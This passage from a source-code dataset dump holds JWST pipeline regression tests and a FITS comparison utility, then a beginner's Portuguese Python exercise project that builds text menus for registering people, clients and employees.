\"msa_flagging\", \"extract_2d\", \"wavecorr\", \"flat_field\", \"srctype\",\n \"pathloss\", \"barshadow\", \"cal\", \"s2d\", \"x1d\"])\ndef test_nirspec_mos_spec2(run_pipeline, fitsdiff_default_kwargs, output):\n \"\"\"Regression test of the calwebb_spec2 pipeline on a\n NIRSpec MOS exposure.\"\"\"\n\n # Run the pipeline and retrieve outputs\n rtdata = run_pipeline\n rtdata.output = \"f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_\" + output + \".fits\"\n\n # Get the truth files\n rtdata.get_truth(os.path.join(\"truth/test_nirspec_mos_spec2\",\n \"f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_\" + output + \".fits\"))\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5664354562759399, "alphanum_fraction": 0.5777493715286255, "avg_line_length": 41.547279357910156, "blob_id": "21d7b87b07fc4fd1346419600d8dd9272aec601b", "content_id": "a91c905b941a8fb2690fdef0671b08b2b1b4b86d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14849, "license_type": "permissive", "max_line_length": 80, "num_lines": 349, "path": "/jwst/tests/compare_outputs.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import copy\nfrom datetime import datetime\nimport os\nfrom difflib import unified_diff\nfrom io import StringIO\n\nfrom ci_watson.artifactory_helpers import (\n get_bigdata,\n BigdataError,\n generate_upload_schema,\n)\n\nfrom astropy.io import fits\nfrom astropy.io.fits import FITSDiff, HDUDiff\n\n\nTODAYS_DATE = datetime.now().strftime(\"%Y-%m-%d\")\n\ndef compare_outputs(outputs, raise_error=True, ignore_keywords=[],\n ignore_hdus=[], ignore_fields=[], rtol=0.0, atol=0.0,\n input_path=[], docopy=True, results_root=None,\n verbose=True):\n \"\"\"\n Compare output with \"truth\" using appropriate\n diff routine; namely:\n * ``fitsdiff`` for FITS file comparisons.\n * ``unified_diff`` for ASCII products.\n Only after all elements of ``outputs`` have been\n processed will the method report any success or failure, with\n failure of any one comparison *not* preventing the rest of the\n comparisons to be performed.\n Parameters\n ----------\n outputs : list of tuple or dict\n This list defines what outputs from running the test will be\n compared. Three distinct types of values as list elements\n are supported:\n * 2-tuple : ``(test output filename, truth filename)``\n * 3-tuple : ``(test output filename, truth filename, HDU names)``\n * dict : ``{'files': (output, truth), 'pars': {key: val}}``\n If filename contains extension such as ``[hdrtab]``,\n it will be interpreted as specifying comparison of just that HDU.\n raise_error : bool\n Raise ``AssertionError`` if difference is found.\n ignore_keywords : list of str\n List of FITS header keywords to be ignored by\n ``FITSDiff`` and ``HDUDiff``.\n ignore_hdus : list of str\n List of FITS HDU names to ignore by ``FITSDiff``.\n This is only available for ``astropy>=3.1``.\n ignore_fields : list of str\n List FITS table column names to be ignored by\n ``FITSDiff`` and ``HDUDiff``.\n rtol, atol : float\n Relative and absolute tolerance to be used by\n ``FITSDiff`` and ``HDUDiff``.\n input_path : list or tuple\n A series of sub-directory names under :func:`get_bigdata_root`\n that leads to the path of the 'truth' files to be compared\n against. If not provided, it assumes that 'truth' is in the\n working directory. For example, with :func:`get_bigdata_root`\n pointing to ``/grp/test_data``, a file at::\n /grp/test_data/pipeline/dev/ins/test_1/test_a.py\n would require ``input_path`` of::\n [\"pipeline\", \"dev\", \"ins\", \"test_1\"]\n docopy : bool\n If `True`, 'truth' will be copied to output directory before\n comparison is done.\n results_root : str or `None`\n If not `None`, for every failed comparison, the test output\n is automatically renamed to the given 'truth' in the output\n directory and :func:`generate_upload_schema` will be called\n to generate a JSON scheme for Artifactory upload.\n If you do not need this functionality, use ``results_root=None``.\n verbose : bool\n Print extra info to screen.\n Returns\n -------\n creature_report : str\n Report from FITS or ASCII comparator.\n This is part of error message if ``raise_error=True``.\n Examples\n --------\n There are multiple use cases for this method, specifically\n related to how ``outputs`` are defined upon calling this method.\n The specification of the ``outputs`` can be any combination of the\n following patterns:\n 1. 2-tuple inputs::\n outputs = [('file1.fits', 'file1_truth.fits')]\n This definition indicates that ``file1.fits`` should be compared\n as a whole with ``file1_truth.fits``.\n 2. 2-tuple inputs with extensions::\n outputs = [('file1.fits[hdrtab]', 'file1_truth.fits[hdrtab]')]\n This definition indicates that only the HDRTAB extension from\n ``file1.fits`` will be compared to the HDRTAB extension from\n ``file1_truth.fits``.\n 3. 3-tuple inputs::\n outputs = [('file1.fits', 'file1_truth.fits', ['primary', 'sci'])]\n This definition indicates that only the PRIMARY and SCI extensions\n should be compared between the two files. This creates a temporary\n ``HDUList`` object comprising only the given extensions for comparison.\n 4. Dictionary of inputs and parameters::\n outputs = [{'files': ('file1.fits', 'file1_truth.fits'),\n 'pars': {'ignore_keywords': ['ROOTNAME']}}]\n This definition indicates that ROOTNAME will be ignored during\n the comparison between the files specified in ``'files'``.\n Any input parameter for ``FITSDiff`` or ``HDUDiff`` can be specified\n as part of the ``'pars'`` dictionary.\n In addition, the input files listed in ``'files'`` can also include\n an extension specification, such as ``[hdrtab]``, to limit the\n comparison to just that extension.\n This example from an actual test definition demonstrates\n how multiple input defintions can be used at the same time::\n outputs = [\n ('jw99999_nircam_f140m-maskbar_psfstack.fits',\n 'jw99999_nircam_f140m-maskbar_psfstack_ref.fits'\n ),\n ('jw9999947001_02102_00002_nrcb3_a3001_crfints.fits',\n 'jw9999947001_02102_00002_nrcb3_a3001_crfints_ref.fits'\n ),\n {'files': ('jw99999_nircam_f140m-maskbar_i2d.fits',\n 'jw99999_nircam_f140m-maskbar_i2d_ref.fits'),\n 'pars': {'ignore_hdus': ['HDRTAB']},\n {'files': ('jw99999_nircam_f140m-maskbar_i2d.fits',\n 'jw99999_nircam_f140m-maskbar_i2d_ref.fits',\n ['primary','sci','dq']),\n 'pars': {'rtol': 0.000001}\n },\n {'files': ('jw99999_nircam_f140m-maskbar_i2d.fits[hdrtab]',\n 'jw99999_nircam_f140m-maskbar_i2d_ref.fits[hdrtab]'),\n 'pars': {'ignore_keywords': ['NAXIS1', 'TFORM*'],\n 'ignore_fields': ['COL1', 'COL2']}\n }]\n .. note:: Each ``outputs`` entry in the list gets interpreted and processed\n separately.\n \"\"\"\n __tracebackhide__ = True\n default_kwargs = {'rtol': rtol, 'atol': atol,\n 'ignore_keywords': ignore_keywords,\n 'ignore_fields': ignore_fields,\n 'ignore_hdus': ignore_hdus}\n\n all_okay = True\n creature_report = ''\n updated_outputs = [] # To track outputs for Artifactory JSON schema\n\n for entry in outputs:\n diff_kwargs = copy.deepcopy(default_kwargs)\n extn_list = None\n num_entries = len(entry)\n\n if isinstance(entry, dict):\n entry_files = entry['files']\n actual = entry_files[0]\n desired = entry_files[1]\n if len(entry_files) > 2:\n extn_list = entry_files[2]\n diff_kwargs.update(entry.get('pars', {}))\n elif num_entries == 2:\n actual, desired = entry\n elif num_entries == 3:\n actual, desired, extn_list = entry\n else:\n all_okay = False\n creature_report += '\\nERROR: Cannot handle entry {}\\n'.format(\n entry)\n continue\n\n # TODO: Use regex?\n if actual.endswith(']'):\n if extn_list is not None:\n all_okay = False\n creature_report += (\n '\\nERROR: Ambiguous extension requirements '\n 'for {} ({})\\n'.format(actual, extn_list))\n continue\n actual_name, actual_extn = actual.split('[')\n actual_extn = actual_extn.replace(']', '')\n else:\n actual_name = actual\n actual_extn = None\n\n if desired.endswith(']'):\n if extn_list is not None:\n all_okay = False\n creature_report += (\n '\\nERROR: Ambiguous extension requirements '\n 'for {} ({})\\n'.format(desired, extn_list))\n continue\n desired_name, desired_extn = desired.split('[')\n desired_extn = desired_extn.replace(']', '')\n else:\n desired_name = desired\n desired_extn = None\n\n actual = os.path.abspath(actual)\n\n # Get \"truth\" image\n try:\n os.makedirs('truth', exist_ok=True)\n os.chdir('truth')\n desired = get_bigdata(*input_path, desired_name, docopy=docopy)\n desired = os.path.abspath(desired)\n os.chdir('..')\n except BigdataError:\n all_okay = False\n creature_report += '\\nERROR: Cannot find {} in {}\\n'.format(\n desired_name, input_path)\n continue\n\n if desired_extn is not None:\n desired_name = desired\n desired = \"{}[{}]\".format(desired, desired_extn)\n\n if verbose:\n print(\"\\nComparing:\\n {}\\n {}\".format(actual, desired))\n\n if actual.endswith('.fits') and desired.endswith('.fits'):\n # Build HDULists for comparison based on user-specified extensions\n if extn_list is not None:\n with fits.open(actual) as f_act:\n with fits.open(desired) as f_des:\n actual_hdu = fits.HDUList(\n [f_act[extn] for extn in extn_list])\n actual_hdu.filename = lambda: os.path.basename(actual)\n desired_hdu = fits.HDUList(\n [f_des[extn] for extn in extn_list])\n desired_hdu.filename = lambda: os.path.basename(desired)\n fdiff = FITSDiff(actual_hdu, desired_hdu,\n **diff_kwargs)\n creature_report += '\\na: {}\\nb: {}\\n'.format(\n actual, desired) # diff report only gives hash\n # Working with FITS files...\n else:\n fdiff = FITSDiff(actual, desired, **diff_kwargs)\n\n creature_report += fdiff.report()\n\n if not fdiff.identical:\n all_okay = False\n # Only keep track of failed results which need to\n # be used to replace the truth files (if OK).\n updated_outputs.append((actual, desired))\n\n elif actual_extn is not None or desired_extn is not None:\n if 'ignore_hdus' in diff_kwargs: # pragma: no cover\n diff_kwargs.pop('ignore_hdus') # Not applicable\n\n # Specific element of FITS file specified\n with fits.open(actual_name) as f_act:\n with fits.open(desired_name) as f_des:\n actual_hdu = f_act[actual_extn]\n desired_hdu = f_des[desired_extn]\n fdiff = HDUDiff(actual_hdu, desired_hdu, **diff_kwargs)\n\n creature_report += 'a: {}\\nb: {}\\n'.format(actual, desired)\n creature_report += fdiff.report()\n\n if not fdiff.identical:\n all_okay = False\n # Only keep track of failed results which need to\n # be used to replace the truth files (if OK).\n updated_outputs.append((actual_name, desired_name))\n\n else:\n # ASCII-based diff\n with open(actual) as afile:\n actual_lines = afile.readlines()\n with open(desired) as dfile:\n desired_lines = dfile.readlines()\n\n udiff = unified_diff(actual_lines, desired_lines,\n fromfile=actual, tofile=desired)\n udiffIO = StringIO()\n udiffIO.writelines(udiff)\n udiff_report = udiffIO.getvalue()\n udiffIO.close()\n\n if len(udiff_report) == 0:\n creature_report += ('\\na: {}\\nb: {}\\nNo differences '\n 'found.\\n'.format(actual, desired))\n else:\n all_okay = False\n creature_report += udiff_report\n # Only keep track of failed results which need to\n # be used to replace the truth files (if OK).\n updated_outputs.append((actual, desired))\n\n if not all_okay and results_root is not None: # pragma: no cover\n schema_pattern, tree, testname = generate_upload_params(\n results_root, updated_outputs, verbose=verbose)\n generate_upload_schema(schema_pattern, tree, testname)\n\n if not all_okay and raise_error:\n raise AssertionError(os.linesep + creature_report)\n\n return creature_report\n\n\ndef generate_upload_params(results_root, updated_outputs, verbose=True):\n \"\"\"\n Generate pattern, target, and test name for :func:`generate_upload_schema`.\n This uses ``BUILD_TAG`` and ``BUILD_MATRIX_SUFFIX`` on Jenkins CI to create\n meaningful Artifactory target path. They are optional for local runs.\n Other attributes like user, time stamp, and test name are also\n automatically determined.\n In addition to renamed outputs, ``*.log``is also inserted into the\n ``schema_pattern``.\n Parameters\n ----------\n results_root : str\n See :func:`compare_outputs` for more info.\n updated_outputs : list\n List containing tuples of ``(actual, desired)`` of failed\n test output comparison to be processed.\n verbose : bool\n Print extra info to screen.\n Returns\n -------\n schema_pattern, tree, testname\n Analogous to ``pattern``, ``target``, and ``testname`` that are\n passed into :func:`generate_upload_schema`, respectively.\n \"\"\"\n import getpass\n\n # Create instructions for uploading results to artifactory for use\n # as new comparison/truth files\n testname = os.path.split(os.path.abspath(os.curdir))[1]\n\n # Meaningful test dir from build info.\n # TODO: Organize results by day test was run. Could replace with git-hash\n whoami = getpass.getuser() or 'nobody'\n user_tag = 'NOT_CI_{}'.format(whoami)\n build_tag = os.environ.get('BUILD_TAG', user_tag)\n build_matrix_suffix = os.environ.get('BUILD_MATRIX_SUFFIX', '0')\n subdir = '{}_{}_{}'.format(TODAYS_DATE, build_tag, build_matrix_suffix)\n tree = os.path.join(results_root, subdir, testname) + os.sep\n schema_pattern = []\n\n # Write out JSON file to enable retention of different results.\n # Also rename outputs as new truths.\n for test_result, truth in updated_outputs:\n schema_pattern.append(test_result)\n if verbose:\n print(\"\\nFailed comparison:\")\n print(\" {}\".format(test_result))\n print(\" {}\".format(truth))\n\n return schema_pattern, tree, testname\n" }, { "alpha_fraction": 0.44609054923057556, "alphanum_fraction": 0.565432071685791, "avg_line_length": 38.83606719970703, "blob_id": "8e194c0949320cdaffdc4de48d5f94d9bcae6a06", "content_id": "d7932ced80664aaa286ba25d2cac96b6ccecc3fd", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2430, "license_type": "permissive", "max_line_length": 77, "num_lines": 61, "path": "/jwst/tests_nightly/general/nircam/test_coron3_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.pipeline import Coron3Pipeline\n\n\[email protected]\nclass TestCoron3Pipeline(BaseJWSTTest):\n rtol = 0.00001\n atol = 0.00001\n input_loc = 'nircam'\n ref_loc = ['test_coron3', 'truth']\n\n def test_coron3_1(self):\n \"\"\"Regression test of calwebb_coron3 pipeline.\n\n Test is performed on NIRCam simulated data.\n \"\"\"\n asn_name = 'jw99999-a3001_20170327t121212_coron3_001_asn.json'\n override_psfmask = 'jwst_nircam_psfmask_somb.fits'\n\n # get a local copy of the inputs\n asn_file = self.get_data('test_coron3', asn_name)\n psfmask_file = self.get_data('test_coron3', override_psfmask)\n for file in raw_from_asn(asn_file):\n self.get_data('test_coron3', file)\n\n pipe = Coron3Pipeline()\n pipe.align_refs.override_psfmask = psfmask_file\n pipe.outlier_detection.resample_data = False\n pipe.run(asn_file)\n\n self.ignore_keywords += ['NAXIS1', 'TFORM*']\n self.ignore_fields = self.ignore_keywords\n\n outputs = [( # Compare psfstack product\n 'jw99999-a3001_t1_nircam_f140m-maskbar_psfstack.fits',\n 'jw99999-a3001_t1_nircam_f140m-maskbar_psfstack_ref.fits'\n ),\n ( # Compare psfalign product\n 'jw9999947001_02102_00001_nrcb3_a3001_psfalign.fits',\n 'jw99999-a3001_t1_nircam_f140m-maskbar_psfalign_ref.fits'\n ),\n ( # Compare psfsub product\n 'jw9999947001_02102_00001_nrcb3_a3001_psfsub.fits',\n 'jw9999947001_02102_00001_nrcb3_psfsub_ref.fits'\n ),\n ( # Compare level-2c products\n 'jw9999947001_02102_00001_nrcb3_a3001_crfints.fits',\n 'jw9999947001_02102_00001_nrcb3_a3001_crfints_ref.fits'\n ),\n (\n 'jw9999947001_02102_00002_nrcb3_a3001_crfints.fits',\n 'jw9999947001_02102_00002_nrcb3_a3001_crfints_ref.fits'\n ),\n ( # Compare i2d product\n 'jw99999-a3001_t1_nircam_f140m-maskbar_i2d.fits',\n 'jw99999-a3001_t1_nircam_f140m-maskbar_i2d_ref.fits'\n )\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.4848000109195709, "alphanum_fraction": 0.5776000022888184, "avg_line_length": 38.0625, "blob_id": "2b6acdb4ea12675954d05f0cd66659df15f09844", "content_id": "fc2ad323975d38b882cfb2d0c0c203519769b9f4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1250, "license_type": "permissive", "max_line_length": 82, "num_lines": 32, "path": "/jwst/tests_nightly/general/miri/test_image2pipeline_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline import Image2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_image2pipeline1(self):\n \"\"\"\n Regression test of calwebb_image2 pipeline performed on MIRI data.\n \"\"\"\n input_file = self.get_data('test_image2pipeline',\n 'jw00001001001_01101_00001_mirimage_rate.fits')\n collect_pipeline_cfgs('cfgs')\n Image2Pipeline.call(input_file,\n config_file='cfgs/calwebb_image2.cfg',\n save_results=True\n )\n\n outputs = [('jw00001001001_01101_00001_mirimage_cal.fits',\n 'jw00001001001_01101_00001_mirimage_cal_ref.fits',\n ['primary','sci','err','dq','area']),\n ('jw00001001001_01101_00001_mirimage_i2d.fits',\n 'jw00001001001_01101_00001_mirimage_i2d_ref.fits',\n ['primary','sci','wht','con'])\n ]\n self.compare_outputs(outputs)\n" } ]
94
Brun0C/projeto_python
https://github.com/Brun0C/projeto_python
2e39ee83c6eb437f9b24c3ed9eedb6573ca289d4
ac544bfeb27447e820e4e2b0bd936de00d8b3348
e9b2d33d3f0e54e3f186aee656eecd0af105b49f
refs/heads/main
2023-06-17T17:36:00.553526
2021-07-16T22:05:18
2021-07-16T22:05:18
385,416,177
0
0
MIT
2021-07-12T23:56:27
2021-07-13T00:04:45
2021-07-13T00:43:35
null
[ { "alpha_fraction": 0.7080292105674744, "alphanum_fraction": 0.7080292105674744, "avg_line_length": 21.66666603088379, "blob_id": "8a4e7f8a2d3c1a162d2f0eb7c772c06c6e79eaf2", "content_id": "1f2ca05965cb46a10f6a0d425209b308b02957ad", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/Python/Minha_Biblioteca/criar_menu/pessoas.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def cadastrar_pessoa():\n print('Pessoa cadastrada com sucesso.')\n\n\ndef listar_pessoas():\n print('Operação realizada com sucesso')\n\n" }, { "alpha_fraction": 0.6348039507865906, "alphanum_fraction": 0.6348039507865906, "avg_line_length": 23.9375, "blob_id": "8511523f31202ba5d3bdd7e3e6f99bce6c78434a", "content_id": "b54036fc7e7cab85c12b999cbf33aa19d7b861d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "permissive", "max_line_length": 91, "num_lines": 16, "path": "/Python/Curso_em_Video/Exercicios/exer115/menu/menus.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "'''\nMódulos contendo os dados para criação dos menus do programa.\n'''\n\ndef menu_principal():\n '''\n Modulo que retorna uma tupla contendo o titulo e as opções para criar o Menu Principal.\n '''\n import pessoa\n \n titulo = 'Menu Principal'\n opcoes = {\n 'Cadastrar pessoa': pessoa.cadastrar,\n 'Listar pessoas cadastradas': pessoa.listar\n }\n return titulo, opcoes\n \n " }, { "alpha_fraction": 0.4912280738353729, "alphanum_fraction": 0.5029239654541016, "avg_line_length": 20.897436141967773, "blob_id": "a71fe37244b3198e2c867d2c8cc7ff81e577a4ba", "content_id": "7aae353d7b66bc27d4e061e03f7b6e714e399d62", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 856, "license_type": "permissive", "max_line_length": 61, "num_lines": 39, "path": "/Python/Curso_em_Video/Exercicios/exer115/pessoa/__init__.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def apagar():\n pass\n\n\ndef atualizar():\n print('Cadastrada atualizado')\n\n\ndef cadastrar():\n from uteis import cabecalho, limpar_tela\n \n nome = idade = ''\n while True:\n limpar_tela()\n cabecalho(' Cadastrar Pessoa')\n \n if not nome:\n nome = input('Nome: ').strip()\n if not nome:\n continue\n else:\n print(f'Nome: {nome}')\n \n idade = input('Idade: ').strip()\n if not idade.isdecimal():\n print('\\033[31m')\n cabecalho('ERRO!!! Insira somente números.', 1.5)\n print('\\033[m')\n input('Pressione ENTER para continuar...')\n continue\n idade = int(idade)\n break\n \n print('\\nPessoa cadastrada\\n')\n input('Pressione ENTER para continuar...')\n\n\ndef listar():\n pass\n\n" }, { "alpha_fraction": 0.4634782671928406, "alphanum_fraction": 0.47217389941215515, "avg_line_length": 29.83783721923828, "blob_id": "76416ddb1467bc724ac0fce62cdc88a9f3326379", "content_id": "4dd25c2b5b94d70511f3df2faebdfc15b4fdbd1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1159, "license_type": "permissive", "max_line_length": 59, "num_lines": 37, "path": "/Python/Minha_Biblioteca/criar_menu/menu.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def exibir_menu(titulo: str, opcoes: dict):\n \n from sys import platform\n from IPython.display import clear_output as cls_out\n import os\n \n tamanho_título = len(titulo) + 25\n while True:\n cls_out(wait=True)\n \n if platform == \"linux\" or platform == \"linux2\":\n # linux\n os.system('clear')\n elif platform == \"win32\":\n # Windows...\n #os.system('pause')\n os.system('cls')\n \n print(\n '=' * tamanho_título,\n titulo.upper().center(tamanho_título),\n '=' * tamanho_título,\n sep = '\\n'\n )\n for indice, opcao in enumerate(opcoes, 1):\n print(f'[{indice}] - {opcao}')\n print('\\n[0] - Sair')\n op = str(input('\\nEscolha uma opção: ')).strip()\n if op.isdecimal():\n if int(op) == 0:\n break\n elif 0 < int(op) <= len(opcoes):\n funcao = list(opcoes.values())[int(op) - 1]\n return funcao\n \n print('ERROR!!! Opção inválida.')\n input('Pressione ENTER para continua...')\n \n" }, { "alpha_fraction": 0.6608695387840271, "alphanum_fraction": 0.6608695387840271, "avg_line_length": 35.79999923706055, "blob_id": "f1210c9f15c038821e618ba25d9b8755f6b6fbaa", "content_id": "628aa97141569c48fd60d3e11367210a43374a50", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 927, "license_type": "permissive", "max_line_length": 108, "num_lines": 25, "path": "/Python/Curso_em_Video/Exercicios/exer115/exer115.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "from menu import menus, menu\nfrom uteis import limpar_tela\n\nir_para = menus.menu_principal\nvoltar_para = {}\n\nwhile ir_para:\n limpar_tela()\n dados = ir_para() #se modulo for um menu, retorna uma tupla contendo titulo e opções, senão retorna None\n \n if dados:\n titulo, opcoes = dados #descompacta tupla contendo titulo e opções\n \n while ir_para in list(voltar_para.values()):\n voltar_para.popitem() #remove o valor de 'voltar_para' até que 'ir_para' não esteja contido nele\n\n opcoes.update(voltar_para) #adiciona os valores de 'voltar_para' para serem exibidos no menu\n voltar_para[f'Voltar ao {titulo}'] = ir_para #caminho percorrido entre menus\n\t \n ir_para = menu.exibir_menu(titulo, opcoes) #cria o menu e retorna o caminho do modulo seguinte\n \n else:\n _, ir_para = voltar_para.popitem()\n \nprint('\\nFinalizando o Programa...')\n" }, { "alpha_fraction": 0.6308926939964294, "alphanum_fraction": 0.6339017152786255, "avg_line_length": 25.891891479492188, "blob_id": "08f8a87f18fcafe57b040dd4f1bb8a69587931d9", "content_id": "fec4edcaba0aa8ffd766c78057500eae7344847f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1000, "license_type": "permissive", "max_line_length": 75, "num_lines": 37, "path": "/Python/Minha_Biblioteca/criar_menu/menus.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "import clientes, funcionarios, pessoas\n\ndef menu_principal():\n titulo = 'Menu Principal'\n opcoes = {\n menu_pessoa()[0]: menu_pessoa,\n menu_funcionario()[0]: menu_funcionario,\n menu_cliente()[0]: menu_cliente\n }\n return [titulo, opcoes]\n \n \ndef menu_pessoa():\n titulo = 'Dados Pessoas'\n opcoes = {\n 'Cadastrar Nova Pessoa': pessoas.cadastrar_pessoa,\n 'Listar Pessoas Cadastradas': pessoas.listar_pessoas\n }\n return [titulo, opcoes]\n \n \ndef menu_funcionario():\n titulo = 'Dados Funcionários'\n opcoes = {\n 'Cadastrar Novo Funcionário': funcionarios.cadastrar_funcionario,\n 'Listar Funcionários Cadastrados': funcionarios.listar_funcionarios\n }\n return [titulo, opcoes]\n \n \ndef menu_cliente():\n titulo = 'Dados Cliente'\n opcoes = {\n 'Cadastrar Nova Pessoa': clientes.cadastrar_cliente,\n 'Listar Pessoas Cadastradas': clientes.listar_clientes\n }\n return [titulo, opcoes]\n \n" }, { "alpha_fraction": 0.49464139342308044, "alphanum_fraction": 0.5276174545288086, "avg_line_length": 33.42856979370117, "blob_id": "29c0c8d7fa7e4ec2a6005179a8b756109482136f", "content_id": "28cbec0bb927b265fc5e40332d36c3ebc022f214", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1229, "license_type": "permissive", "max_line_length": 73, "num_lines": 35, "path": "/Python/Curso_em_Video/Exercicios/exer115/menu/menu.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def exibir_menu(titulo, opcoes):\n '''\n --> Cria um menu interativo retornando a opção escolhida.\n :param titulo: string para exibir nome dado ao menu.\n :param opcoes: dicionario de opções para exibir no menu, \n onde a chave é o nome da opção e o valor\n caminho para chamar a função.\n :return: retorna o valor do dicionario, escolhido nas opções do menu.\n '''\n \n from uteis import limpar_tela, cabecalho\n \n while True:\n \n cabecalho(titulo)\n \n for indice, opcao in enumerate(opcoes, 1):\n print(f'\\033[33m[{indice}] - \\033[34m{opcao}\\033[m')\n print('\\n\\033[33m[0] - \\033[34mSair\\033[m\\n')\n \n op = str(input('Escolha uma opção: ')).strip()\n \n if op.isdecimal():\n if int(op) == 0:\n print('Saindo do sistema...')\n break\n elif 0 < int(op) <= len(opcoes):\n funcao = list(opcoes.values())[int(op) - 1]\n return funcao\n\n print('\\033[31m')\n cabecalho('ERRO!!! Opção inválida.', 2)\n print('\\033[m' )\n input('Pressione ENTER para continuar...')\n limpar_tela()\n " }, { "alpha_fraction": 0.5150624513626099, "alphanum_fraction": 0.5194709897041321, "avg_line_length": 23.581817626953125, "blob_id": "73f2dbd5af77b613f2a02c9c153d272bdc9aec7e", "content_id": "3677b4e40aadeb9d6f907c4e377e1d7797feb124", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1373, "license_type": "permissive", "max_line_length": 80, "num_lines": 55, "path": "/Python/Curso_em_Video/Exercicios/exer115/uteis/__init__.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def limpar_tela():\n \n '''\n Limpa todo o conteúdo do console do Jupyter Notebook e do terminar (Prompt).\n '''\n \n from IPython.display import clear_output as cls_out\n from sys import platform\n import os\n \n def no_terminal():\n\n '''\n Limpa todo o conteúdo do terminal (Prompt).\n '''\n\n if platform == \"linux\" or platform == \"linux2\":\n # linux\n os.system('clear')\n elif platform == \"win32\":\n # Windows...\n os.system('cls')\n\n\n def no_jupyter():\n\n '''\n Limpa todo o conteúdo do console do Jupyter Notebook.\n '''\n \n cls_out(wait=True)\n \n \n no_terminal()\n no_jupyter()\n \n \ndef cabecalho(msg: str, num: int = 3):\n '''\n --> Formata uma mensagem colocando-a dentro de uma moldura.\n :param msg: string para exibir nome dado ao menu.\n :param opcoes: dicionario de opções para exibir no menu, \n onde a chave é o nome da opção e o valor\n caminho para chamar a função.\n :return: retorna o valor do dicionario, escolhido nas opções do menu.\n '''\n \n tamanho_msg = int(len(msg) * num + 2)\n \n print(\n '=' * tamanho_msg,\n f'|{msg.upper().center(tamanho_msg-2)}|',\n '=' * tamanho_msg,\n sep = '\\n'\n )\n \n " }, { "alpha_fraction": 0.7346938848495483, "alphanum_fraction": 0.7346938848495483, "avg_line_length": 23.33333396911621, "blob_id": "64da0ba808c43c179ea57a6f9c2f6128046f27a5", "content_id": "a1e408dc14e0796ea89b31b20a8ac1f22df49f30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/Python/Minha_Biblioteca/criar_menu/funcionarios.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def cadastrar_funcionario():\n print('Operação realizada com sucesso')\n\n\ndef listar_funcionarios():\n print('Operação realizada com sucesso')\n\n" }, { "alpha_fraction": 0.7194244861602783, "alphanum_fraction": 0.7194244861602783, "avg_line_length": 22, "blob_id": "32ec04941e146d4a5e69202e143d6ff3cde3a715", "content_id": "978012f7001f62997ca4a87c8b56c83fbab37423", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/Python/Minha_Biblioteca/criar_menu/clientes.py", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "def cadastrar_cliente():\n print('Operação realizada com sucesso')\n\n\ndef listar_clientes():\n print('Operação realizada com sucesso')\n\n" }, { "alpha_fraction": 0.7251461744308472, "alphanum_fraction": 0.7485380172729492, "avg_line_length": 41.75, "blob_id": "8d77582a587fb9b71f8389ee37aefbcee5668455", "content_id": "0a2b2865666249e7a7e3037a13ef20dbecc09ef7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 171, "license_type": "permissive", "max_line_length": 103, "num_lines": 4, "path": "/README.md", "repo_name": "Brun0C/projeto_python", "src_encoding": "UTF-8", "text": "# My Binder\nhttps://mybinder.org/v2/gh/Brun0C/projeto_python/main\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/Brun0C/projeto_python/main)\n" } ]
11
gitter-badger/taucmdr
https://github.com/gitter-badger/taucmdr
94042da5dbf9aecc9c8f5234f3ebd2378980618c
7af0070f4f81b16b3645f5c27e9d42ad72933695
cf806e2af2c23c5e72bef2bb05aa4e62905e4d6c
